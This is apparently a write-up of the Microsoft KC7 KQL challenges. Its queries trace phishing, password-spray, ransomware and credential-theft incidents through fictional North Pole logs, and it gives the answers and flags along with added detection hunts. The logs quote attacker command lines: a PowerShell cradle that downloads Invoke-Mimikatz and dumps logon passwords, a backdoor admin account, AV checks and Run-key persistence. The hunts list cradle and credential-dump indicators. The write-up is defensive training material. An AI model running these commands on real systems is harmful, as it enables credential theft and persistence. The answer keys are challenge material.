Microsoft KC7
Answer two sections for silver, all four sections for gold.
Difficulty: ❄ ❄ ❄ ❄ ❄
KQL 101
Learn and practice basic KQL queries to analyze data logs for North Pole operations.
Section 1: KQL 101
Question 1
Type let’s do this to begin your KQL training.
ANSWER: let's do this
Question 2
Once you’ve examined all the tables, type when in doubt take 10 to proceed.
ANSWER: when in doubt take 10
Question 3
How many elves did you find?
QUERY:

```kql
Employees
| count
```

RESULTS:

| Count |
|---|
| 90 |
ANSWER: 90
Question 4
Can you find out the name of the Chief Toy Maker?
QUERY:

```kql
Employees
| where role == "Chief Toy Maker"
| project name
```

RESULTS:

| name |
|---|
| Shinny Upatree |
ANSWER: Shinny Upatree
Question 5
Type operator to continue.
ANSWER: operator
Question 6
How many emails did Angel Candysalt receive?
QUERY:

```kql
Email
| join kind=inner Employees on $left.recipient == $right.email_addr   // resolve the recipient address to an elf
| where name == "Angel Candysalt"
| count
```

RESULTS:

| Count |
|---|
| 31 |
ANSWER: 31
Question 7
How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org?
QUERY:

```kql
Email
| where sender == "twinkle_frostington@santaworkshopgeeseislands.org"   // exact match on the sender address
| distinct recipient
| count
```

RESULTS:

| Count |
|---|
| 32 |
ANSWER: 32
Question 8
How many distinct websites did Twinkle Frostington visit?
QUERY:

```kql
OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr   // attribute traffic to an elf by source IP
| where name == "Twinkle Frostington"
| distinct url
| count
```

RESULTS:

| Count |
|---|
| 4 |
ANSWER: 4
Question 9
How many distinct domains in the PassiveDns records contain the word green?
QUERY:

```kql
PassiveDns
| where domain contains "green"   // case-insensitive substring match
| distinct domain
| count
```

RESULTS:

| Count |
|---|
| 10 |
ANSWER: 10
Question 10
How many distinct URLs did elves with the first name Twinkle visit?
QUERY:

```kql
OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr
| where name has "Twinkle"        // whole-term match, so it catches every elf whose first name is Twinkle
| distinct url
| count
```

RESULTS:

| Count |
|---|
| 8 |
ANSWER: 8
Operation Surrender
Investigate a phishing attack targeting Wombley’s team, uncovering espionage activities.
Section 2: Operation Surrender: Alabaster’s Espionage
Question 1
Type surrender to continue.
ANSWER: surrender
Question 2
Who was the sender of the phishing email that set this plan into motion?
QUERY:

```kql
Email
| where subject contains "surrender"
| distinct sender
```

RESULTS:

| sender |
|---|
| surrender@northpolemail.com |
ANSWER: surrender@northpolemail.com
Question 3
How many elves from Team Wombley received the phishing email?
QUERY:

```kql
Email
| where subject contains "surrender"
| distinct recipient
| count
```

RESULTS:

| Count |
|---|
| 22 |
ANSWER: 22
Question 4
What was the filename of the document that Team Alabaster distributed in their phishing email?
QUERY:

```kql
Email
| where subject contains "surrender"
| extend filename = tostring(split(link, "/")[-1])   // last path segment of the link
| distinct filename
```

RESULTS:

| filename |
|---|
| Team_Wombley_Surrender.doc |
ANSWER: Team_Wombley_Surrender.doc
Question 5
Who was the first person from Team Wombley to click the URL in the phishing email?
QUERY:

```kql
Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where url has "Team_Wombley_Surrender.doc"
| sort by timestamp asc          // earliest click first
| take 1
| project name
```

RESULTS:

| name |
|---|
| Joyelle Tinseltoe |
ANSWER: Joyelle Tinseltoe
Question 6
What was the filename that was created after the .doc was downloaded and executed?
QUERY:

```kql
Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| join kind=inner ProcessEvents on hostname, username        // ProcessEvents' timestamp becomes timestamp1
| where name has "Joyelle Tinseltoe" and url has "Team_Wombley_Surrender.doc"
    and timestamp1 > timestamp                                // only processes started after the download
| sort by timestamp1 asc
| take 2
| project download_timestamp = timestamp, execution_timestamp = timestamp1, process_commandline, process_name
```

RESULTS:

| download_timestamp | execution_timestamp | process_commandline | process_name |
|---|---|---|---|
| 2024-11-27T14:11:45Z | 2024-11-27T14:12:44Z | Explorer.exe "C:\Users\jotinseltoe\Downloads\Team_Wombley_Surrender.doc" | Explorer.exe |
| 2024-11-27T14:11:45Z | 2024-11-27T14:12:45Z | C:\Users\Public\AppData\Roaming\keylogger.exe | keylogger.exe |

ANSWER:
The results show that Joyelle opened the document (Explorer.exe launching Team_Wombley_Surrender.doc) only 59 seconds after downloading it (😡 bad user!). The very next process event, one second later, has the command line C:\Users\Public\AppData\Roaming\keylogger.exe: an executable in a user-writable location with no legitimate reason to be there, which is exactly what a payload dropped by a malicious document looks like.
The answer is the filename keylogger.exe.
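The download-then-execute correlation above is worth keeping as a reusable hunt rather than a one-off for Joyelle. The query below is an added example, not part of the original write-up or the KC7 material: it generalises Question 6 to every elf who fetched the lure, joins on hostname and username as above, and keeps only processes that started within a window after the download. The table and column names are the ones used on this page; the 5-minute window and the exclusion of the Explorer.exe document-open event are assumptions to tune for your environment.

```kql
// Added example, not from the original write-up. Generalises Section 2, Question 6:
// for every elf who downloaded the lure, list the first thing that ran on their host afterwards.
let window = 5m;                                  // assumption: how long after the download still counts
let lure = "Team_Wombley_Surrender.doc";
OutboundNetworkEvents
| where url has lure
| join kind=inner Employees on $left.src_ip == $right.ip_addr
| project download_time = timestamp, name, hostname, username, url
| join kind=inner (
    ProcessEvents
    | project exec_time = timestamp, hostname, username, process_name, process_commandline
  ) on hostname, username
| where exec_time between (download_time .. (download_time + window))
// the user opening the document is expected; what it spawns next is the finding
| where process_commandline !has lure
| summarize arg_min(exec_time, process_name, process_commandline) by name, download_time
| project name, download_time, exec_time, process_name, process_commandline
| sort by exec_time asc
```

Because `arg_min` runs per elf, the output is one row per victim with the earliest post-open process, so a keylogger dropped on twenty machines shows up as twenty rows with the same process_name rather than being buried in a `take 2`.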
Question 7
To obtain your flag use the KQL below with your last answer!
QUERY:

```kql
print base64_encode_tostring("keylogger.exe");
```

RESULTS:

| print_0 |
|---|
| a2V5bG9nZ2VyLmV4ZQ== |
ANSWER: a2V5bG9nZ2VyLmV4ZQ==
Operation Snowfall
Track and analyze the impacts of a ransomware attack initiated by Wombley’s faction.
Section 3: Operation Snowfall: Team Wombley’s Ransomware Raid
Question 1
Type snowfall to begin
ANSWER: snowfall
Question 2
What was the IP address associated with the password spray?
QUERY:

```kql
AuthenticationEvents
| where result == "Failed Login"
| summarize dcount(username) by src_ip     // how many distinct accounts each source tried
| sort by dcount_username desc
| take 1
```

RESULTS:

| src_ip | dcount_username |
|---|---|
| 59.171.58.12 | 44 |
ANSWER: 59.171.58.12
Question 3
How many unique accounts were impacted where there was a successful login from 59.171.58.12?
QUERY:

```kql
AuthenticationEvents
| where result != "Failed Login" and src_ip == "59.171.58.12"
| distinct username
| count
```

RESULTS:

| Count |
|---|
| 23 |
ANSWER: 23
Question 4
What service was used to access these accounts/devices?
QUERY:

```kql
AuthenticationEvents
| where src_ip == "59.171.58.12" and result != "Failed Login"
| extend service = tostring(split(split(description, " ")[-1], ".")[0])   // last word of the description, trailing period stripped
| distinct service
```

RESULTS:

| service |
|---|
| RDP |
ANSWER: RDP
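Taking the single noisiest IP (Question 2) is fine in a small training data set; in a real tenant a spray detection needs a threshold, a time window, and a link from the spray to the logins it produced. The query below is an added example, not from the original write-up: it flags every source that attempts at least `min_accounts` distinct usernames inside a one-hour bucket, then lists the accounts, hosts and services that source successfully logged into afterwards, reusing the `description` parsing from Question 4. The thresholds are assumptions; the column names are those of the page's AuthenticationEvents table.

```kql
// Added example, not from the original write-up. Generalises Section 3, Questions 2-4:
// find every spraying source by threshold, then the accounts it actually got into.
let min_accounts = 10;                 // assumption: distinct usernames tried from one IP...
let window = 1h;                       // ...inside one time bucket
let spray_sources =
    AuthenticationEvents
    | where result == "Failed Login"
    | summarize tried_accounts = dcount(username), failures = count()
        by src_ip, bucket = bin(timestamp, window)
    | where tried_accounts >= min_accounts
    | summarize spray_start = min(bucket), tried_accounts = max(tried_accounts), failures = sum(failures)
        by src_ip;
AuthenticationEvents
| where result != "Failed Login"
| join kind=inner spray_sources on src_ip
| where timestamp >= spray_start       // only successes after the spray began count as compromise
// same parsing as Question 4: the service is the last word of the description
| extend service = tostring(split(split(description, " ")[-1], ".")[0])
| summarize first_success = min(timestamp),
            compromised_accounts = make_set(username),
            hosts = make_set(hostname),
            services = make_set(service)
    by src_ip, tried_accounts, failures
| sort by array_length(compromised_accounts) desc
```

Binning by `window` is what separates a spray (many accounts, short burst) from a slow credential-stuffing campaign; lowering `min_accounts` or widening `window` trades false positives for recall.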
Question 5
What file was exfiltrated from Alabaster’s laptop?
QUERY:

```kql
AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname                      // ProcessEvents' timestamp becomes timestamp1
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login"
    and timestamp1 > timestamp and process_commandline has "copy"  // copy commands run after the attacker's login
| sort by timestamp1 asc
| project timestamp1, process_commandline
```

RESULTS:

| timestamp1 | process_commandline |
|---|---|
| 2024-12-15T14:52:13Z | Copy-Item "C:\\Malware\\EncryptEverything.exe" -Destination "C:\\Windows\\Users\\alsnowball" |
| 2024-12-15T14:52:32Z | copy C:\Windows\Users\alsnowball\top secret\Snowball_Cannon_Plans.pdf C:\Users\alsnowball\Documents\Snowball_Cannon_Plans.pdf |
| 2024-12-16T14:53:27Z | copy C:\Windows\Users\alsnowball\top secret\Drone_Configurations.pdf C:\Users\alsnowball\Documents\Drone_Configurations.pdf |
| 2024-12-16T15:51:52Z | copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip |

ANSWER:
ProcessEvents shows four copy commands after the attacker's RDP login. The first three stage files locally: the EncryptEverything.exe binary is copied in from C:\Malware, and two PDFs are moved out of the "top secret" folder into Documents. Only the last one, copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip, writes to a destination off the laptop (the UNC share \\wocube\share), so that is the exfiltration.
The answer is the filename Secret_Files.zip.
Question 6
What is the name of the malicious file that was run on Alabaster’s laptop?
QUERY:

```kql
AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login"
    and timestamp1 > timestamp                                   // everything that ran after the attacker's login
| distinct process_name
```

RESULTS:

| process_name |
|---|
| cmd.exe |
| svchost.exe |
| msedgewebview2.exe |
| powershell.exe |
| EncryptEverything.exe |
| searchprotocolhost.exe |
| comppkgsrv.exe |
| Copy-Item |

ANSWER:
Among the processes seen on Alabaster's machine after the successful logins from 59.171.58.12, most are ordinary Windows binaries (cmd.exe, svchost.exe, powershell.exe, and so on). EncryptEverything.exe is the one that stands out: it is not a Windows component, it was copied in from C:\Malware in Question 5, and its name matches the ransomware this section is about. The answer is EncryptEverything.exe.
Question 7
To obtain your flag use the KQL below with your last answer!
QUERY:

```kql
print base64_encode_tostring("EncryptEverything.exe");
```

RESULTS:

| print_0 |
|---|
| RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl |
ANSWER: RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl
Echoes in the Frost
Use logs to trace an unknown phishing attack targeting Alabaster’s faction.
Section 4: Echoes in the Frost: Tracking the Unknown Threat
Question 1
Type stay frosty to begin
ANSWER: stay frosty
Question 2
What was the timestamp of first phishing email about the breached credentials received by Noel Boetie?
QUERY:

```kql
Email
| where subject has "credentials"
| join kind=inner Employees on $left.recipient == $right.email_addr   // restrict to Noel's mailbox, as the question asks
| where name == "Noel Boetie"
| sort by timestamp asc
| take 1
| project timestamp
```

RESULTS:

| timestamp |
|---|
| 2024-12-12T14:48:55Z |
ANSWER: 2024-12-12T14:48:55Z
Question 3
When did Noel Boetie click the link to the first file?
QUERY:

```kql
Email
| where subject has "credentials"
| join kind=inner Employees on $left.recipient == $right.email_addr
| where name == "Noel Boetie"
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip, $left.link == $right.url   // the click: same host, same URL as the mail
| where timestamp1 > timestamp        // the click must come after the mail arrived
| sort by timestamp1 asc
| take 1
| project timestamp1
```

RESULTS:

| timestamp1 |
|---|
| 2024-12-12T15:13:55Z |
ANSWER: 2024-12-12T15:13:55Z
Question 4
What was the IP for the domain where the file was hosted?
QUERY:

```kql
Email
| where subject has "credentials"
| extend domain = tostring(split(link, "/")[2])   // host part of the URL (scheme://host/...)
| join kind=inner PassiveDns on domain
| distinct ip
```

RESULTS:

| ip |
|---|
| 182.56.23.122 |
ANSWER: 182.56.23.122
Question 5
Let’s take a closer look at the authentication events. I wonder if there are any connection events from 182.56.23.122. If so, what hostname was accessed?
QUERY:

```kql
AuthenticationEvents
| where src_ip == "182.56.23.122"
| distinct hostname
```

RESULTS:

| hostname |
|---|
| WebApp-ElvesWorkshop |
ANSWER: WebApp-ElvesWorkshop
Question 6
What was the script that was run to obtain credentials?
QUERY:

```kql
AuthenticationEvents
| where src_ip == "182.56.23.122"
| join kind=inner ProcessEvents on hostname     // ProcessEvents' timestamp becomes timestamp1
| where timestamp1 > timestamp                  // commands run after the attacker's login
| sort by timestamp1 asc
| project process_commandline
```

RESULTS:

| process_commandline |
|---|
| net user frosty AllYourBaseBelongToUs /add |
| powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords" |
| net view /domain |
| net localgroup administrators frosty /add |
| ipconfig /all |
| tasklist \| findstr /I "mcshield.exe" |
| tasklist \| findstr /I "norton.exe" |
| tasklist \| findstr /I "avp.exe" |

ANSWER:
Among the commands executed after the authentication from 182.56.23.122, the line powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords" is a download cradle: it fetches Invoke-Mimikatz.ps1 from GitHub, executes it in memory with IEX, and then dumps logon credentials from LSASS. The surrounding commands (net user ... /add, net localgroup administrators ... /add, and the tasklist | findstr checks for AV processes) confirm this is post-compromise activity on WebApp-ElvesWorkshop.
The answer is the script name Invoke-Mimikatz.ps1.
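The command lines in Question 6 are a textbook post-exploitation sequence: a PowerShell download cradle fetching Invoke-Mimikatz, LSASS credential dumping, local account creation and elevation, and checks for AV processes. Rather than pivoting from one already-known source IP, a detection should look for those behaviours on every host. The query below is an added example, not from the original write-up; the indicator lists and the "two or more techniques on one host" threshold are assumptions, and process_commandline, hostname, username and timestamp are the ProcessEvents columns used on this page.

```kql
// Added example, not from the original write-up. Hunts across all hosts for the
// behaviours seen in Section 4, Question 6. Indicator lists are assumptions.
let download_cradles = dynamic(["DownloadString", "DownloadFile", "Invoke-WebRequest", "certutil -urlcache", "bitsadmin /transfer"]);
let credential_tools = dynamic(["Invoke-Mimikatz", "sekurlsa::", "lsadump::", "procdump"]);
let av_processes     = dynamic(["mcshield.exe", "norton.exe", "avp.exe"]);   // the names probed in Question 6
ProcessEvents
| extend technique = case(
    process_commandline has_any (credential_tools),                                        "credential_dumping",
    process_commandline has_any (download_cradles),                                        "download_cradle",
    process_commandline has "net user" and process_commandline has "/add",                 "account_creation",
    process_commandline has "localgroup administrators" and process_commandline has "/add", "privilege_escalation",
    process_commandline has "tasklist" and process_commandline has_any (av_processes),     "security_software_discovery",
    "")
| where isnotempty(technique)
// pull the remote URL out of a cradle so it can be pivoted to PassiveDns / OutboundNetworkEvents
| extend remote_url = extract(@"https?://[^\s""')]+", 0, process_commandline)
| summarize first_seen = min(timestamp), last_seen = max(timestamp), events = count(),
            techniques = make_set(technique),
            urls = make_set_if(remote_url, isnotempty(remote_url))
    by hostname, username
// several distinct techniques on one host is a much stronger signal than any single line
| where array_length(techniques) >= 2
| sort by first_seen asc
```

Each `case` branch maps to one behaviour, so a host with only a single `net user /add` (an admin doing their job) is filtered out, while the WebApp-ElvesWorkshop sequence above lights up on all five.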
Question 7
What is the timestamp where Noel executed the file?
QUERY:

```kql
Email
| where subject has "credentials"
| join kind=inner Employees on $left.recipient == $right.email_addr
| where name == "Noel Boetie"
| join kind=inner ProcessEvents on hostname               // ProcessEvents' timestamp becomes timestamp1
| extend filename = tostring(split(link, "/")[-1])        // the file name at the end of the phishing link
| where process_commandline has filename and timestamp1 > timestamp   // executed after the mail arrived
| sort by timestamp1 asc
| take 1
| project timestamp1, process_commandline
```

RESULTS:

| timestamp1 | process_commandline |
|---|---|
| 2024-12-12T15:14:38Z | Explorer.exe "C:\Users\noboetie\Downloads\echo.exe" |
ANSWER: 2024-12-12T15:14:38Z
Question 8
What domain was the holidaycandy.hta file downloaded from?
QUERY:

```kql
OutboundNetworkEvents
| where url has "holidaycandy.hta"
| extend domain = tostring(split(url, "/")[2])   // host part of the URL
| distinct domain
```

RESULTS:

| domain |
|---|
| compromisedchristmastoys.com |
ANSWER: compromisedchristmastoys.com
Question 9
What was the first file that was created after extraction?
QUERY:

```kql
ProcessEvents
| where process_commandline has "frosty.zip"         // the tar -xf extraction command
| join kind=inner FileCreationEvents on hostname     // FileCreationEvents' timestamp becomes timestamp1
| where timestamp1 > timestamp                       // files created after the extraction started
// distinct does not preserve sort order, so order first and take the earliest row
| sort by timestamp1 asc
| take 1
| project filename
```

RESULTS:

| filename |
|---|
| sqlwriter.exe |
ANSWER: sqlwriter.exe
Question 10
What is the name of the property assigned to the new registry key?
QUERY:

```kql
ProcessEvents
| where process_commandline has "frosty.txt"       // anchor on the command that referenced frosty.txt
| join kind=inner ProcessEvents on hostname       // self-join: everything else that ran on that host
| where timestamp1 > timestamp                    // only commands that came later
| project process_commandline1
```

RESULTS:

| process_commandline1 |
|---|
| tar -xf C:\\Windows\\Tasks\\frosty.zip -C C:\\Windows\\Tasks\\ |
| New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force \| New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force |
ANSWER: frosty
Question 11
To obtain your FINAL flag use the KQL below with your last answer!
QUERY:

```kql
print base64_encode_tostring("frosty");
```

RESULTS:

| print_0 |
|---|
| ZnJvc3R5 |
ANSWER: ZnJvc3R5